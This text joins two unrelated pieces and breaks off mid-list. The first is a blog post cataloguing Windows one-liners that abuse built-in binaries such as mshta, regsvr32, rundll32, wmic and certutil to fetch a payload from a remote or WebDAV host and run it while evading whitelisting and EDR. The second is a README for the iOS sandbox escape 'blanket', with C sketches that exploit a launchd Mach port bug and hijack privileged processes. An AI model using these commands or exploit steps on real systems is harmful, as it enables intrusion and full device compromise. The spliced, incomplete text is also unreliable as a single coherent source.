Windows oneliners to download remote payload and execute arbitrary code

In the wake of the recent buzz and trend in using DDE to execute arbitrary command lines and eventually compromise a system, I asked myself: what are the coolest command lines an attacker could use besides the famous PowerShell one-liner?

These command lines need to fulfill the following prerequisites:

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits, huh?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, will it?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays?
  • make use of standard, widely deployed Microsoft binaries as much as possible – because you want this command line to execute on as many systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet?
  • work in memory only – because your final payload might get caught by AV when written to disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is ultimately what we want: executing arbitrary code by abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points, especially the “do not write the payload on disk” one, because most of the time the downloaded file will end up in a local cache.

When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

  1. either the command itself accepts an HTTP URL as one of its arguments
  2. the command accepts a UNC path (pointing to a WebDAV server)
  3. the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one of the following locations:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. If it’s not, you can start it even from a low-privileged user by simply prepending your command line with “pushd \\webdavserver & popd”.

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.

Powershell


Ok, this is by far the most famous one, but also probably the most monitored one, if not outright blocked. A well-known proxy-friendly command line is the following:

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon !)

Of course you could also use its encoded counterpart.

But you can also call the payload directly from a WebDAV server:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cmd


Why make things complicated when you can have cmd.exe execute a batch file? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything you can think of!). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior’s work), and see that you can easily drop any binary, DLL, or script: https://github.com/Arno0x/PowerShellScripts
So once you’ve been creative with your payload as a batch file, go for it:

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript


Also very common, but the idea here is to download the payload from a remote server in one command line:

cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta


Mshta is really in the same family as cscript/wscript, but with the added capability of executing an inline script that will download and execute a scriptlet as a payload:

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

mshta http://webserver/payload.hta

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Finally, the following also works, with the advantage of hiding the fact that mshta.exe is downloading stuff:

mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32


This is a well-known one as well and can be used in different ways. The first one refers to a standard DLL using a UNC path:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe
Payload written on disk: IE local cache

Wmic


Discovered by @subTee with @mattifestation, wmic can invoke a local or remote XSL (eXtensible Stylesheet Language) file, which may contain some scripting of our choice:

wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe
Payload written on disk: IE local cache

Regasm/Regsvc


Regasm and Regsvc are two of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (it can be written in .NET/C#) that exposes the proper interfaces, and you can then call it over WebDAV:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32


Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option:

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Odbcconf


This one is close to the regsvr32 technique. Also discovered by @subTee, it can execute a DLL that exposes a specific function. Note that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Msbuild


Let’s keep going with all these .NET framework utilities discovered by @subTee. You cannot use msbuild.exe with an inline task straight from a UNC path (actually you can, but it gets really messy), so I came up with the following trick, using msbuild.exe only. Note that it must be called from a shell with delayed expansion enabled (the /V option):

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands


After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

certutil -urlcache -split -f http://webserver/payload payload

Now let’s combine some commands on one line, with InstallUtil.exe executing a specific DLL as the payload:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

There are probably many other ways of achieving the same result, but these command lines do the job while fulfilling most of the prerequisites we set at the beginning of this post!

One may wonder why I don’t mention the bitsadmin utility as a means of downloading a payload. I’ve left it aside on purpose, simply because it’s not proxy aware.

Payload source examples


All the command lines previously cited make use of specific payloads:

  • Various scriptlets (.sct), for mshta, rundll32 or regsvr32
  • XSL files for wmic
  • HTML Application (.hta)
  • MSBuild inline tasks (.xml or .csproj)
  • DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT

You can also find some other examples on my gist: https://gist.github.com/Arno0x

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allow entitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a “malicious” exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied by task_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORT special port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the “task” field. An equivalent API, thread_set_special_port, can be used to set a custom port in the “thread” field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a “malicious” exception message containing a Mach service port in place of the task and thread ports. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the “malicious” exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASH exceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abort function.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASH exception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port (a minimal C sketch follows the list below):

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.
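
Putting these steps together, a minimal C sketch of the crasher might look like the following. This is an illustrative sketch rather than blanket’s actual code: the function and service names are placeholders and error handling is omitted.

// crasher.c - sketch of steps 1-4 above.
#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdlib.h>

void trigger_launchd_bug(const char *service_name) {
    // Step 1: make launchd this thread's EXC_CRASH handler, requesting
    // mach_exception_raise messages (EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES).
    thread_set_exception_ports(mach_thread_self(), EXC_MASK_CRASH, bootstrap_port,
                               EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
    // Step 2: look up the service port we want launchd to over-deallocate.
    mach_port_t service = MACH_PORT_NULL;
    bootstrap_look_up(bootstrap_port, service_name, &service);
    // Step 3: substitute the service port for our task and thread ports in any
    // exception message the kernel generates for us.
    task_set_special_port(mach_task_self(), TASK_KERNEL_PORT, service);
    thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, service);
    // Step 4: abort() raises EXC_CRASH; the kernel sends launchd an exception
    // message whose "task" and "thread" fields are really the service port.
    abort();
}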

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programmatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASH, EXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identity message that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the “task” port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the “task” port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.
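
Steps 6 and 7 amount to a raw mach_msg() receive on the fake SafetyNet port followed by task_get_special_port. Here is a rough sketch; the request layout below matches a mach_exception_raise message with MACH_EXCEPTION_CODES, and the struct and variable names are my own.

#include <mach/mach.h>
#include <mach/ndr.h>
#include <stdint.h>

// Approximate wire format of a mach_exception_raise request (64-bit codes).
typedef struct {
    mach_msg_header_t          Head;
    mach_msg_body_t            msgh_body;
    mach_msg_port_descriptor_t thread;
    mach_msg_port_descriptor_t task;
    NDR_record_t               NDR;
    exception_type_t           exception;
    mach_msg_type_number_t     codeCnt;
    int64_t                    code[2];
    mach_msg_trailer_t         trailer;
} exc_raise_request_t;

mach_port_t get_host_priv(mach_port_t fake_safetynet_port) {
    exc_raise_request_t req = {0};
    // Step 6: block until the kernel delivers ReportCrash's EXC_CRASH message.
    mach_msg(&req.Head, MACH_RCV_MSG, 0, sizeof(req), fake_safetynet_port,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    mach_port_t reportcrash_task = req.task.name;
    // Step 7: ReportCrash is unsandboxed and runs as root, so its host port is
    // the host-priv port.
    mach_port_t host_priv = MACH_PORT_NULL;
    task_get_special_port(reportcrash_task, TASK_HOST_PORT, &host_priv);
    return host_priv;
}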

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of “vulnerabilities” would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look at convert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.
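
As a concrete illustration of this loophole, something like the following works from a non-platform binary even when mach_vm_write on the same task port fails. It is only a sketch (an arm64 build is assumed, the names are mine, and in practice you would suspend the thread before touching its state):

#include <mach/mach.h>

kern_return_t poke_first_thread(mach_port_t task /* task_inspect_t access is enough */) {
    thread_act_array_t threads;
    mach_msg_type_number_t count = 0;
    // task_threads() takes a task_inspect_t, so task_conversion_eval is never
    // consulted, yet it returns full thread_act_t send rights.
    kern_return_t kr = task_threads(task, &threads, &count);
    if (kr != KERN_SUCCESS || count == 0)
        return kr;
    arm_thread_state64_t state;
    mach_msg_type_number_t state_count = ARM_THREAD_STATE64_COUNT;
    thread_get_state(threads[0], ARM_THREAD_STATE64, (thread_state_t)&state, &state_count);
    // With get/set state we can point pc and the argument registers wherever we
    // like, which is the basis for building a function-call primitive.
    return thread_set_state(threads[0], ARM_THREAD_STATE64, (thread_state_t)&state, state_count);
}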

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
